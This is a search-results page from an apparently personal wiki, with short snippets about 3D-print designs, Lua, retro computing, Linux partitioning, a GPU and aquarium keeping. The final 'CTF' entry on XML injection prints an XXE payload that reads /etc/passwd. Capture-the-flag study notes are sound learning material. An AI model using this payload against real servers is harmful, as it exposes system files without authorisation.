Skip to main content
Advanced Search
Search Terms
Content Type

Exact Matches
Tag Searches
Date Options
Updated after
Updated before
Created after
Created before

Search Results

168 total results found

Small Parts Tray

3D Printing 3D Print Designs

Useful tray for keeping small parts, nuts, bolts, screws etc. organized for assembly. parts-tray.FCStd parts-tray.3mf parts-tray.stl

Lua Cheetsheet

Games Game Coding Recipes

Tables Tables are the object in Lua, they can hold values like array (integer index) or any other index like map that is not nil. Create table and append element foo = {} table.insert(foo, "bar") Iterate table as array for i, val in ipairs(foo) do pri...

Filaments

3D Printing

Source: https://help.prusa3d.com/filament-material-guide

Shower Wall Holder

3D Printing 3D Print Designs

Shower_Wall_Holder.FCStd Shower_Wall_Holder.stl  

IKEA Sofa Fix

3D Printing 3D Print Designs

Ikea_Sofa_Fix.FCStd Ikea_Sofa_Fix.stl

Games on-line

Games

Fantasy consoles Pico8 TIC-80

New Page

RC2014 RC2014 Cards

Quazar SID Interface

RC2014 RC2014 Cards

SID Programming https://www.c64-wiki.com/wiki/SID MOS6581_SID_data_sheet.pdf Memory Addresses of the SID Reg Function 0 frequency voice 1 low byte 1 frequency voice 1 high byte 2 pulse wave duty cycle voice 1 low byte   ...

Rasberry Pi Debug Probe

Electronics Boards & Kits

CMSIS-DAP UART (U) and I2C connector (D) Does not provide power, target board needs to be powered but mind it needs shared ground Pinout Orange - TX/SC (Output from Probe) Black - GND Yellow - RX/SD (Input to Probe or I/O) Pico connection ...

Nvidia GeForce RTX 3050

Linux

TL;DR: Utter piece of hot garbage - literally. Don't buy yesterday, today or ever. Linus was right! H/W GeForce RTX 3050 low profile for compact Dell PC. I needed something below 80W of power drain due to limited power supply (that is rated for 80W GPU). ...

New Page

Linux

Expanding parititions

Linux

Backup partition table fdixk -x /dev/<dev> sfdisk -d /dev/<dev> > partition.dump Shrinking EXT(2,3,4) file system to minimum size e2fsck -f /dev/<dev partition> resize2fs -M /dev/<dev parition> Editing partition table and restore After shining the last ...

Aquarium

Water quality

Aquarium

Units L Gallons (US) 1 0.264 3.785 1 6 ~1.5 12 ~3 20 ~5 30 ~8 40 ~10 Total Ammonia Nitrogen (NH3/NH4+) to PPM Drop test result * 0.0131 @ 24C, 7.4PH = unionized ammonia. Dangerous level for fish is 0.05. Nitrogen Cycle Source Ammonia ...

Fish

Aquarium

Species Min aquarium size [L] pH °C dGH Size [cm] Neon tetra 40 6-7.5 22-26 1-10 4 Ember tetra 40 6-7.5 22-28 4-10 2-3 Corydoras - black venezuela, albino 60 6-7.5 18-26 3-10 6-7 Dwarf shrimp - yellow 20 ...

Log

Aquarium

Id Fish Introduced Perished 1 Neon tetra 2026-01-09 2026-01-11 2 Neon tetra 2026-01-09 2026-01-20 3 Neon tetra 2026-01-09 2026-01-21 4 Neon tetra 2026-01-09 2026-01-28 5 Neon tetra 2026-01-09 6 Pleco Bulldog 2026-01-09 2026-01-18 7 Neon tet...

CTF

XML injection

CTF

XXE XML External Entity <?xml version="1.0"?> <!DOCTYPE root [<!ENTITY test SYSTEM 'file:///etc/passwd'>]> <root>&test;</root>